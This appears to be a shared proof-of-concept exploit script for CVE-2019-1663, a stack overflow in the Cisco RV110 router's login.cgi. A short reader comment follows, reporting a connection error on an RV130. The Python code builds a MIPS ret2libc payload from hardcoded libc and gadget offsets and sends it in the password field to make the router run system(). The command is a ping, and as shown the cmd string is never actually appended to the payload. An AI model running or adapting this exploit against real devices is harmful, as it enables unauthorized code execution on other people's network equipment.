PoC for CVE-2019-1663 on R110(W)

CVE_2019_1663_RV110.py

#!/usr/bin/env python
"""
Exploit for Cisco RV110 stack buffer overflow (CVE-2019-1663).
---------------------------------------------------------------
It simply executes a ret2libc, calling system() with whatever's on the stack
as argument. Offsets are for QEMU target.

First MIPS-based exploit, might delete later.
"""
import requests
import sys
import struct
import string

# libraries and offsets
libc = 0x77aff000
system_offset = 0x00050d70
gadget1_offset = 0x00024098 # addiu $a0, $sp, 0x20; lw $gp, 0x10($sp); lw $ra, 0x18($sp); jr $ra; addiu $sp, $sp, 0x20;
bypass = 0x7ffde010
gp_address = 0x77ba4560

message = "A" * 105 # Padding
message += struct.pack("<L", libc+gadget1_offset) #
message += struct.pack("<L", bypass) * 4
message += struct.pack("<L", gp_address) # this is a valid value for GP, however %60 is a backtick that might get in the way of execution with busybox.
message += "BBBB"
message += struct.pack("<L", libc+system_offset) # ra
message += "ZZZZ"
# cmd must be less than 24 characters so we can keep proper Global Pointer val
cmd = "ping -c3 127.0.0.1 #"
message += "#" * int(len(cmd) % 4)
message += struct.pack("<L", gp_address) * 20

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print "Usage: %s ip" % (sys.argv[0])
        sys.exit(1)
    params = {
    "submit_button": "login",
    "submit_type": None,
    "gui_action": None,
    "wait_time": 0,
    "change_action": None,
    "enc": 1,
    "user": "cisco",
    "pwd": message,
    "sel_lang": "EN"
    }
    requests.post("https://%s/login.cgi" % sys.argv[1], data=params, verify=False)

Hello.
Exception worked, similar problem in another file (RV130):
requests.exceptions.ConnectionError: ('Connection aborted.', BadStatusLine("''",))

May be - params to json data?